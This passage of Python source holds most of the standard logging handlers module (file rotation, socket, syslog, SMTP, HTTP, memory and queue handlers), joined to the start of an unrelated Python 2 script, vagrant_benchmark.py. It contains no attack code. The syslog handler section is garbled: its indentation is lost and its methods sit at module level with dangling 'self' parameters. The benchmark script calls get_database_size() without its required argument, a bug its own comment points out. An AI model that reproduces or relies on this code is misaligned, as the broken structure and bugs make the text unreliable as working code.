        the one with the oldest suffix.
        """
        if self.stream:
            self.stream.close()
            self.stream = None
        # get the time that this sequence started at and make it a TimeTuple
        currentTime = int(time.time())
        dstNow = time.localtime(currentTime)[-1]
        t = self.rolloverAt - self.interval
        if self.utc:
            timeTuple = time.gmtime(t)
        else:
            timeTuple = time.localtime(t)
            dstThen = timeTuple[-1]
            if dstNow != dstThen:
                # A DST transition happened during the interval: shift the
                # suffix timestamp so it reflects the interval's wall-clock
                # start rather than being off by an hour.
                if dstNow:
                    addend = 3600
                else:
                    addend = -3600
                timeTuple = time.localtime(t + addend)
        dfn = self.rotation_filename(self.baseFilename + "." +
                                     time.strftime(self.suffix, timeTuple))
        if os.path.exists(dfn):
            os.remove(dfn)
        self.rotate(self.baseFilename, dfn)
        if self.backupCount > 0:
            for s in self.getFilesToDelete():
                os.remove(s)
        if not self.delay:
            self.stream = self._open()
        newRolloverAt = self.computeRollover(currentTime)
        while newRolloverAt <= currentTime:
            newRolloverAt = newRolloverAt + self.interval
        #If DST changes and midnight or weekly rollover, adjust for this.
        if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
            dstAtRollover = time.localtime(newRolloverAt)[-1]
            if dstNow != dstAtRollover:
                if not dstNow:  # DST kicks in before next rollover, so we need to deduct an hour
                    addend = -3600
                else:           # DST bows out before next rollover, so we need to add an hour
                    addend = 3600
                newRolloverAt += addend
        self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
    """
    A handler for logging to a file, which watches the file
    to see if it has changed while in use. This can happen because of
    usage of programs such as newsyslog and logrotate which perform
    log file rotation. This handler, intended for use under Unix,
    watches the file to see if it has changed since the last emit.
    (A file has changed if its device or inode have changed.)

    If it has changed, the old file stream is closed, and the file
    opened to get a new stream.

    This handler is not appropriate for use under Windows, because
    under Windows open files cannot be moved or renamed - logging
    opens the files with exclusive locks - and so there is no need
    for such a handler. Furthermore, ST_INO is not supported under
    Windows; stat always returns zero for this value.

    This handler is based on a suggestion and patch by Chad J.
    Schroeder.
    """
    def __init__(self, filename, mode='a', encoding=None, delay=False,
                 errors=None):
        if "b" not in mode:
            encoding = io.text_encoding(encoding)
        logging.FileHandler.__init__(self, filename, mode=mode,
                                     encoding=encoding, delay=delay,
                                     errors=errors)
        # (-1, -1) marks "no stream stat yet"; real values are recorded by
        # _statstream() once a stream exists (it may not, if delay is True).
        self.dev, self.ino = -1, -1
        self._statstream()

    def _statstream(self):
        # Record the device and inode of the file backing the current
        # stream, so reopenIfNeeded() can detect external rotation.
        if self.stream:
            sres = os.fstat(self.stream.fileno())
            self.dev, self.ino = sres[ST_DEV], sres[ST_INO]

    def reopenIfNeeded(self):
        """
        Reopen log file if needed.

        Checks if the underlying file has changed, and if it
        has, close the old stream and reopen the file to get the
        current stream.
        """
        # Reduce the chance of race conditions by stat'ing by path only
        # once and then fstat'ing our new fd if we opened a new log stream.
        # See issue #14632: Thanks to John Mulligan for the problem report
        # and patch.
        try:
            # stat the file by path, checking for existence
            sres = os.stat(self.baseFilename)
        except FileNotFoundError:
            sres = None
        # compare file system stat with that of our stream file handle
        if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
            if self.stream is not None:
                # we have an open file handle, clean it up
                self.stream.flush()
                self.stream.close()
                self.stream = None  # See Issue #21742: _open () might fail.
                # open a new file handle and get new stat info from that fd
                self.stream = self._open()
                self._statstream()

    def emit(self, record):
        """
        Emit a record.

        If underlying file has changed, reopen the file before emitting the
        record to it.
        """
        self.reopenIfNeeded()
        logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
    """
    A handler class which writes logging records, in pickle format, to
    a streaming socket. The socket is kept open across logging calls.
    If the peer resets it, an attempt is made to reconnect on the next call.
    The pickle which is sent is that of the LogRecord's attribute dictionary
    (__dict__), so that the receiver does not need to have the logging module
    installed in order to process the logging event.

    To unpickle the record at the receiving end into a LogRecord, use the
    makeLogRecord function.
    """

    def __init__(self, host, port):
        """
        Initializes the handler with a specific host address and port.

        When the attribute *closeOnError* is set to True - if a socket error
        occurs, the socket is silently closed and then reopened on the next
        logging call.
        """
        logging.Handler.__init__(self)
        self.host = host
        self.port = port
        if port is None:
            # port=None means a Unix domain socket; host is then the path.
            self.address = host
        else:
            self.address = (host, port)
        # No connection is attempted here; the socket is created lazily on
        # the first send().
        self.sock = None
        self.closeOnError = False
        self.retryTime = None
        #
        # Exponential backoff parameters.
        #
        self.retryStart = 1.0
        self.retryMax = 30.0
        self.retryFactor = 2.0

    def makeSocket(self, timeout=1):
        """
        A factory method which allows subclasses to define the precise
        type of socket they want.
        """
        if self.port is not None:
            result = socket.create_connection(self.address, timeout=timeout)
        else:
            result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            result.settimeout(timeout)
            try:
                result.connect(self.address)
            except OSError:
                result.close()  # Issue 19182
                raise
        return result

    def createSocket(self):
        """
        Try to create a socket, using an exponential backoff with
        a max retry time. Thanks to Robert Olson for the original patch
        (SF #815911) which has been slightly refactored.
        """
        now = time.time()
        # Either retryTime is None, in which case this
        # is the first time back after a disconnect, or
        # we've waited long enough.
        if self.retryTime is None:
            attempt = True
        else:
            attempt = (now >= self.retryTime)
        if attempt:
            try:
                self.sock = self.makeSocket()
                self.retryTime = None # next time, no delay before trying
            except OSError:
                #Creation failed, so set the retry time and return.
                # retryPeriod grows by retryFactor on each consecutive
                # failure, capped at retryMax.
                if self.retryTime is None:
                    self.retryPeriod = self.retryStart
                else:
                    self.retryPeriod = self.retryPeriod * self.retryFactor
                    if self.retryPeriod > self.retryMax:
                        self.retryPeriod = self.retryMax
                self.retryTime = now + self.retryPeriod

    def send(self, s):
        """
        Send a pickled string to the socket.

        This function allows for partial sends which can happen when the
        network is busy.
        """
        if self.sock is None:
            self.createSocket()
        #self.sock can be None either because we haven't reached the retry
        #time yet, or because we have reached the retry time and retried,
        #but are still unable to connect.
        if self.sock:
            try:
                self.sock.sendall(s)
            except OSError: #pragma: no cover
                self.sock.close()
                self.sock = None  # so we can call createSocket next time

    def makePickle(self, record):
        """
        Pickles the record in binary format with a length prefix, and
        returns it ready for transmission across the socket.
        """
        ei = record.exc_info
        if ei:
            # just to get traceback text into record.exc_text ...
            dummy = self.format(record)
        # See issue #14436: If msg or args are objects, they may not be
        # available on the receiving end. So we convert the msg % args
        # to a string, save it as msg and zap the args.
        d = dict(record.__dict__)
        d['msg'] = record.getMessage()
        d['args'] = None
        d['exc_info'] = None
        # Issue #25685: delete 'message' if present: redundant with 'msg'
        d.pop('message', None)
        # Protocol 1 keeps the payload readable by old unpicklers; the
        # 4-byte big-endian length prefix frames each record on the stream.
        s = pickle.dumps(d, 1)
        slen = struct.pack(">L", len(s))
        return slen + s

    def handleError(self, record):
        """
        Handle an error during logging.

        An error has occurred during logging. Most likely cause -
        connection lost. Close the socket so that we can retry on the
        next event.
        """
        if self.closeOnError and self.sock:
            self.sock.close()
            self.sock = None        #try to reconnect next time
        else:
            logging.Handler.handleError(self, record)

    def emit(self, record):
        """
        Emit a record.

        Pickles the record and writes it to the socket in binary format.
        If there is an error with the socket, silently drop the packet.
        If there was a problem with the socket, re-establishes the
        socket.
        """
        try:
            s = self.makePickle(record)
            self.send(s)
        except Exception:
            self.handleError(record)

    def close(self):
        """
        Closes the socket.
        """
        self.acquire()
        try:
            sock = self.sock
            if sock:
                self.sock = None
                sock.close()
            logging.Handler.close(self)
        finally:
            self.release()
class DatagramHandler(SocketHandler):
    """
    A handler class which writes logging records, in pickle format, to
    a datagram socket.  The pickle which is sent is that of the LogRecord's
    attribute dictionary (__dict__), so that the receiver does not need to
    have the logging module installed in order to process the logging event.

    To unpickle the record at the receiving end into a LogRecord, use the
    makeLogRecord function.
    """

    def __init__(self, host, port):
        """
        Initializes the handler with a specific host address and port.
        """
        SocketHandler.__init__(self, host, port)
        self.closeOnError = False

    def makeSocket(self):
        """
        The factory method of SocketHandler is here overridden to create
        a UDP socket (SOCK_DGRAM).
        """
        # A port of None selects a Unix domain datagram socket instead of UDP.
        family = socket.AF_UNIX if self.port is None else socket.AF_INET
        return socket.socket(family, socket.SOCK_DGRAM)

    def send(self, s):
        """
        Send a pickled string to a socket.

        This function no longer allows for partial sends which can happen
        when the network is busy - UDP does not guarantee delivery and
        can deliver packets out of sequence.
        """
        if self.sock is None:
            self.createSocket()
        self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
    """
    Combine *facility* and *priority* into a single syslog PRI value.

    Either argument may be a string, in which case it is first translated
    to its numeric code through the handler's facility_names /
    priority_names tables; integers are used as-is.
    """
    fac = self.facility_names[facility] if isinstance(facility, str) else facility
    pri = self.priority_names[priority] if isinstance(priority, str) else priority
    # Syslog PRI layout: facility in the high bits, severity in the low 3.
    return (fac << 3) | pri
def close(self):
    """
    Close the syslog socket, then delegate to the base handler close.

    The handler-level lock is held for the duration so a concurrent
    emit() cannot race with the teardown.
    """
    self.acquire()
    try:
        self.socket.close()
        logging.Handler.close(self)
    finally:
        self.release()
def mapPriority(self, levelName):
    """
    Translate a logging level name into a key of the priority_names map.

    Useful when custom levels are in play, or when lowercasing the level
    name is not a safe mapping due to locale issues (see SF #1524081).
    Unknown names fall back to "warning".
    """
    try:
        return self.priority_map[levelName]
    except KeyError:
        return "warning"
ident = ''  # string prepended to every formatted message
append_nul = True  # some old syslog daemons expect a NUL terminator

def emit(self, record):
    """
    Format *record* and ship it to the syslog daemon.

    Exception information attached to the record is NOT transmitted.
    Any failure is routed through handleError().
    """
    try:
        text = self.format(record)
        if self.ident:
            text = self.ident + text
        if self.append_nul:
            text += '\000'
        # Build the PRI header (facility + severity); RFC 5424 requires
        # the wire message to be bytes, so encode both parts as UTF-8.
        priority = '<%d>' % self.encodePriority(
            self.facility, self.mapPriority(record.levelname))
        payload = priority.encode('utf-8') + text.encode('utf-8')
        if self.unixsocket:
            try:
                self.socket.send(payload)
            except OSError:
                # The local daemon may have restarted; reconnect once
                # and retry the send.
                self.socket.close()
                self._connect_unixsocket(self.address)
                self.socket.send(payload)
        elif self.socktype == socket.SOCK_DGRAM:
            self.socket.sendto(payload, self.address)
        else:
            self.socket.sendall(payload)
    except Exception:
        self.handleError(record)
class SMTPHandler(logging.Handler):
    """
    A handler class which sends an SMTP email for each logging event.
    """
    def __init__(self, mailhost, fromaddr, toaddrs, subject,
                 credentials=None, secure=None, timeout=5.0):
        """
        Initialize the handler.

        Initialize the instance with the from and to addresses and subject
        line of the email. To specify a non-standard SMTP port, use the
        (host, port) tuple format for the mailhost argument. To specify
        authentication credentials, supply a (username, password) tuple
        for the credentials argument. To specify the use of a secure
        protocol (TLS), pass in a tuple for the secure argument. This will
        only be used when authentication credentials are supplied. The tuple
        will be either an empty tuple, or a single-value tuple with the name
        of a keyfile, or a 2-value tuple with the names of the keyfile and
        certificate file. (This tuple is passed to the `starttls` method).
        A timeout in seconds can be specified for the SMTP connection (the
        default is 5 seconds, matching the ``timeout`` parameter default).
        """
        logging.Handler.__init__(self)
        if isinstance(mailhost, (list, tuple)):
            self.mailhost, self.mailport = mailhost
        else:
            self.mailhost, self.mailport = mailhost, None
        if isinstance(credentials, (list, tuple)):
            self.username, self.password = credentials
        else:
            # Define both attributes so later code can safely read
            # self.password; previously only self.username was set here.
            self.username = None
            self.password = None
        self.fromaddr = fromaddr
        if isinstance(toaddrs, str):
            # Allow a single recipient to be passed as a plain string.
            toaddrs = [toaddrs]
        self.toaddrs = toaddrs
        self.subject = subject
        self.secure = secure
        self.timeout = timeout

    def getSubject(self, record):
        """
        Determine the subject for the email.

        If you want to specify a subject line which is record-dependent,
        override this method.
        """
        return self.subject

    def emit(self, record):
        """
        Emit a record.

        Format the record and send it to the specified addressees.
        """
        try:
            import smtplib
            from email.message import EmailMessage
            import email.utils
            port = self.mailport
            if not port:
                port = smtplib.SMTP_PORT
            smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
            msg = EmailMessage()
            msg['From'] = self.fromaddr
            msg['To'] = ','.join(self.toaddrs)
            msg['Subject'] = self.getSubject(record)
            msg['Date'] = email.utils.localtime()
            msg.set_content(self.format(record))
            if self.username:
                # TLS is only negotiated when credentials are supplied.
                if self.secure is not None:
                    smtp.ehlo()
                    smtp.starttls(*self.secure)
                    smtp.ehlo()
                smtp.login(self.username, self.password)
            smtp.send_message(msg)
            smtp.quit()
        except Exception:
            self.handleError(record)
class NTEventLogHandler(logging.Handler):
    """
    A handler class which sends events to the NT Event Log. Adds a
    registry entry for the specified application name. If no dllname is
    provided, win32service.pyd (which contains some basic message
    placeholders) is used. Note that use of these placeholders will make
    your event logs big, as the entire message source is held in the log.
    If you want slimmer logs, you have to pass in the name of your own DLL
    which contains the message definitions you want to use in the event log.
    """
    def __init__(self, appname, dllname=None, logtype="Application"):
        logging.Handler.__init__(self)
        try:
            import win32evtlogutil, win32evtlog
            self.appname = appname
            self._welu = win32evtlogutil
            if not dllname:
                # Default to win32service.pyd, located relative to the
                # win32evtlogutil module's own install directory.
                dllname = os.path.split(self._welu.__file__)
                dllname = os.path.split(dllname[0])
                dllname = os.path.join(dllname[0], r'win32service.pyd')
            self.dllname = dllname
            self.logtype = logtype
            self._welu.AddSourceToRegistry(appname, dllname, logtype)
            self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
            self.typemap = {
                logging.DEBUG   : win32evtlog.EVENTLOG_INFORMATION_TYPE,
                logging.INFO    : win32evtlog.EVENTLOG_INFORMATION_TYPE,
                logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
                logging.ERROR   : win32evtlog.EVENTLOG_ERROR_TYPE,
                logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
            }
        except ImportError:
            # Not on Windows (or pywin32 missing): the handler degrades
            # to a no-op, signalled by self._welu being None.
            print("The Python Win32 extensions for NT (service, event "\
                "logging) appear not to be available.")
            self._welu = None

    def getMessageID(self, record):
        """
        Return the message ID for the event record. If you are using your
        own messages, you could do this by having the msg passed to the
        logger being an ID rather than a formatting string. Then, in here,
        you could use a dictionary lookup to get the message ID. This
        version returns 1, which is the base message ID in win32service.pyd.
        """
        return 1

    def getEventCategory(self, record):
        """
        Return the event category for the record.

        Override this if you want to specify your own categories. This version
        returns 0.
        """
        return 0

    def getEventType(self, record):
        """
        Return the event type for the record.

        Override this if you want to specify your own types. This version does
        a mapping using the handler's typemap attribute, which is set up in
        __init__() to a dictionary which contains mappings for DEBUG, INFO,
        WARNING, ERROR and CRITICAL. If you are using your own levels you will
        either need to override this method or place a suitable dictionary in
        the handler's typemap attribute.
        """
        return self.typemap.get(record.levelno, self.deftype)

    def emit(self, record):
        """
        Emit a record.

        Determine the message ID, event category and event type, then
        log the message in the NT event log.
        """
        if self._welu:
            try:
                # Renamed locals: the previous code shadowed the id() and
                # type() builtins inside this method.
                msg_id = self.getMessageID(record)
                event_category = self.getEventCategory(record)
                event_type = self.getEventType(record)
                msg = self.format(record)
                self._welu.ReportEvent(self.appname, msg_id, event_category,
                                       event_type, [msg])
            except Exception:
                self.handleError(record)

    def close(self):
        """
        Clean up this handler.

        You can remove the application name from the registry as a
        source of event log entries. However, if you do this, you will
        not be able to see the events as you intended in the Event Log
        Viewer - it needs to be able to access the registry to get the
        DLL name.
        """
        #self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
        logging.Handler.close(self)
class HTTPHandler(logging.Handler):
    """
    Send each logging record to a Web server, using either GET or POST
    semantics.
    """
    def __init__(self, host, url, method="GET", secure=False, credentials=None,
                 context=None):
        """
        Store the target host, the request URL, and the HTTP method
        ("GET" or "POST"); validates the method/secure/context combination.
        """
        logging.Handler.__init__(self)
        method = method.upper()
        if method not in ("GET", "POST"):
            raise ValueError("method must be GET or POST")
        if not secure and context is not None:
            raise ValueError("context parameter only makes sense "
                             "with secure=True")
        self.host = host
        self.url = url
        self.method = method
        self.secure = secure
        self.credentials = credentials
        self.context = context

    def mapLogRecord(self, record):
        """
        Map the log record into the dict that is sent as the CGI data.
        Overwrite in your class. Contributed by Franz Glasner.
        """
        return record.__dict__

    def getConnection(self, host, secure):
        """
        Return an HTTP[S]Connection for *host*.

        Override when a custom connection is required, for example if
        there is a proxy.
        """
        import http.client
        if secure:
            return http.client.HTTPSConnection(host, context=self.context)
        return http.client.HTTPConnection(host)

    def emit(self, record):
        """
        Send the record to the Web server as a percent-encoded dictionary.
        """
        try:
            import urllib.parse
            host = self.host
            conn = self.getConnection(host, self.secure)
            payload = urllib.parse.urlencode(self.mapLogRecord(record))
            target = self.url
            if self.method == "GET":
                joiner = '&' if '?' in target else '?'
                target = target + "%c%s" % (joiner, payload)
            conn.putrequest(self.method, target)
            # Support multiple hosts on one IP address: strip the
            # optional :port suffix from the host, if present.
            colon = host.find(":")
            if colon >= 0:
                host = host[:colon]
            # See issue #30904: putrequest() already adds the Host
            # header on Python 3.x, so it is not added again here.
            if self.method == "POST":
                conn.putheader("Content-type",
                               "application/x-www-form-urlencoded")
                conn.putheader("Content-length", str(len(payload)))
            if self.credentials:
                import base64
                token = ('%s:%s' % self.credentials).encode('utf-8')
                token = 'Basic ' + base64.b64encode(token).strip().decode('ascii')
                conn.putheader('Authorization', token)
            conn.endheaders()
            if self.method == "POST":
                conn.send(payload.encode('utf-8'))
            conn.getresponse()  # response body is deliberately discarded
        except Exception:
            self.handleError(record)
class BufferingHandler(logging.Handler):
    """
    A handler class which buffers logging records in memory. Whenever each
    record is added to the buffer, a check is made to see if the buffer
    should be flushed; if so, flush() is expected to do what's needed.
    """
    def __init__(self, capacity):
        """Initialize the handler with *capacity*, the buffer size."""
        logging.Handler.__init__(self)
        self.capacity = capacity
        self.buffer = []

    def shouldFlush(self, record):
        """
        Return true when the buffer has reached capacity.

        Override to implement custom flushing strategies.
        """
        return len(self.buffer) >= self.capacity

    def emit(self, record):
        """
        Append *record* to the buffer, flushing if shouldFlush() says so.
        """
        self.buffer.append(record)
        if self.shouldFlush(record):
            self.flush()

    def flush(self):
        """
        Empty the buffer; override for real flushing behaviour.
        """
        self.acquire()
        try:
            self.buffer.clear()
        finally:
            self.release()

    def close(self):
        """
        Flush, then chain to the parent class close().
        """
        try:
            self.flush()
        finally:
            logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
    """
    A handler class which buffers logging records in memory, periodically
    flushing them to a target handler. Flushing occurs whenever the buffer
    is full, or when an event of a certain severity or greater is seen.
    """
    def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
                 flushOnClose=True):
        """
        Initialize with the buffer size, the level at which flushing
        should occur and an optional target handler.

        Without a target (set here or via setTarget()) a MemoryHandler is
        no use to anyone! ``flushOnClose`` defaults to True for backward
        compatibility: closing the handler flushes the buffer even when
        neither the flush level nor the capacity has been exceeded; set
        it to False to prevent that.
        """
        BufferingHandler.__init__(self, capacity)
        self.flushLevel = flushLevel
        self.target = target
        # See Issue #26559 for why flushOnClose was added.
        self.flushOnClose = flushOnClose

    def shouldFlush(self, record):
        """
        Flush when the buffer is full or *record* is at/above flushLevel.
        """
        return (len(self.buffer) >= self.capacity
                or record.levelno >= self.flushLevel)

    def setTarget(self, target):
        """
        Set the target handler, holding the handler lock during the swap.
        """
        self.acquire()
        try:
            self.target = target
        finally:
            self.release()

    def flush(self):
        """
        Send the buffered records to the target, if there is one, and
        clear the buffer. Override for different behaviour. Note the
        buffer is only cleared when a target exists.
        """
        self.acquire()
        try:
            if self.target:
                for buffered in self.buffer:
                    self.target.handle(buffered)
                self.buffer.clear()
        finally:
            self.release()

    def close(self):
        """
        Flush (if so configured), set the target to None and lose the
        buffer.
        """
        try:
            if self.flushOnClose:
                self.flush()
        finally:
            self.acquire()
            try:
                self.target = None
                BufferingHandler.close(self)
            finally:
                self.release()
class QueueHandler(logging.Handler):
    """
    This handler sends events to a queue. Typically, it would be used
    together with a multiprocessing Queue to centralise logging to file in
    one process (in a multi-process application), so as to avoid file
    write contention between processes.

    This code is new in Python 3.2, but this class can be copy pasted into
    user code for use with earlier Python versions.
    """
    def __init__(self, queue):
        """Initialise an instance that forwards records to *queue*."""
        logging.Handler.__init__(self)
        self.queue = queue

    def enqueue(self, record):
        """
        Put *record* on the queue without blocking.

        Override if you want blocking puts, timeouts or a custom queue
        implementation.
        """
        self.queue.put_nowait(record)

    def prepare(self, record):
        """
        Return a copy of *record* made safe for queuing/pickling.

        The merged message (from the handler's format()) replaces the
        record's `msg` and `message`, and `args`, `exc_info` and
        `exc_text` are set to None. Override to e.g. convert the record
        to a dict or JSON string instead.
        """
        # format() folds traceback text into record.exc_text (when there
        # is exception data) and returns the merged message, so the
        # original msg + args - which might be unpickleable - are no
        # longer needed, nor are exc_info/exc_text.
        rendered = self.format(record)
        # bpo-35726: operate on a copy so other handlers in the chain
        # are unaffected by the mutation below.
        clone = copy.copy(record)
        clone.message = rendered
        clone.msg = rendered
        clone.args = None
        clone.exc_info = None
        clone.exc_text = None
        return clone

    def emit(self, record):
        """
        Prepare *record* for pickling and write it to the queue.
        """
        try:
            self.enqueue(self.prepare(record))
        except Exception:
            self.handleError(record)
class QueueListener(object):
    """
    An internal threaded listener which watches for LogRecords being
    added to a queue, removes them and passes them to a list of handlers
    for processing.
    """
    _sentinel = None  # placed on the queue to tell the worker thread to exit

    def __init__(self, queue, *handlers, respect_handler_level=False):
        """
        Initialise an instance with the specified queue and handlers.
        """
        self.queue = queue
        self.handlers = handlers
        self._thread = None
        self.respect_handler_level = respect_handler_level

    def dequeue(self, block):
        """
        Remove and return one record, optionally blocking.

        Override to add timeouts or support custom queue implementations.
        """
        return self.queue.get(block)

    def start(self):
        """
        Start the listener: spawn the daemon thread that monitors the
        queue for LogRecords to process.
        """
        self._thread = worker = threading.Thread(target=self._monitor)
        worker.daemon = True
        worker.start()

    def prepare(self, record):
        """
        Hook for custom marshalling of a record before handling; the
        default is the identity function.
        """
        return record

    def handle(self, record):
        """
        Offer *record* to every handler, honouring handler levels when
        respect_handler_level is set.
        """
        record = self.prepare(record)
        for handler in self.handlers:
            if not self.respect_handler_level or record.levelno >= handler.level:
                handler.handle(record)

    def _monitor(self):
        """
        Drain the queue on the internal thread, handing records to
        handle(); terminates when the sentinel is seen (or the queue
        reports Empty).
        """
        q = self.queue
        has_task_done = hasattr(q, 'task_done')
        while True:
            try:
                record = self.dequeue(True)
                if record is self._sentinel:
                    if has_task_done:
                        q.task_done()
                    break
                self.handle(record)
                if has_task_done:
                    q.task_done()
            except queue.Empty:
                break

    def enqueue_sentinel(self):
        """
        Enqueue the sentinel record (non-blocking).

        Override to use timeouts or custom queue implementations.
        """
        self.queue.put_nowait(self._sentinel)

    def stop(self):
        """
        Stop the listener: ask the thread to terminate and wait for it.

        Records still left on the queue when the application exits
        without calling this will not be processed.
        """
        self.enqueue_sentinel()
        self._thread.join()
        self._thread = None
|
vagrant_benchmark.py | #!/usr/bin/env python
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
import argparse
import datetime
import socket
import traceback
import time
import logging
import json
from multiprocessing import Process, Queue
from deployers import *
from drivers import *
from analyzers import *
import utils
## =====================================================================
## LOGGING CONFIGURATION
## =====================================================================
LOG = logging.getLogger()
def run_driver(driver, timeout, size, queue):
    # Worker entry point (run in a child multiprocessing.Process):
    # repeatedly submit benchmark actions until either the timeout
    # elapses or the database-size limit is reached, then report the
    # total action count back through *queue*.
    cnt = 0
    start_time = time.time()
    stop_time = start_time + timeout
    new_driver = BenchmarkDriver(driver)
    try:
        while True:
            cnt += new_driver.submit_actions()
            # NOTE(review): get_database_size() is defined in this file
            # as get_database_size(deployer) but is called here with no
            # argument, which raises TypeError on the first check. A
            # deployer (or a size callback) needs to be threaded through
            # to this worker - confirm against the caller in main().
            if time.time() >= stop_time or get_database_size() >= size:
                break
        queue.put(cnt)
    # Python 2 "except Exception, e" syntax; the bound exception object
    # is unused - the traceback is printed and the partial count is
    # still reported so main() does not block on queue.get().
    except Exception, e:
        traceback.print_exc()
        queue.put(cnt)
def get_database_size(deployer):
    """
    Return the size (in MB, rounded to one decimal) of the deployer's
    MySQL database, computed as the sum of data + index length of all
    tables in the configured schema.
    """
    deployer.database = Database()
    deployer.database.name = 'MySQL'
    conn = deployer.get_database_connection(False)
    cur = conn.cursor()
    try:
        # NOTE(review): the schema name is interpolated from local
        # config; if it can ever be user-supplied, switch to a
        # parameterized query.
        cur.execute('''
            SELECT Round(SUM(data_length + index_length) / 1024 / 1024, 1)
            FROM information_schema.tables
            WHERE table_schema = '{}'
        '''.format(deployer.database_config['name']))
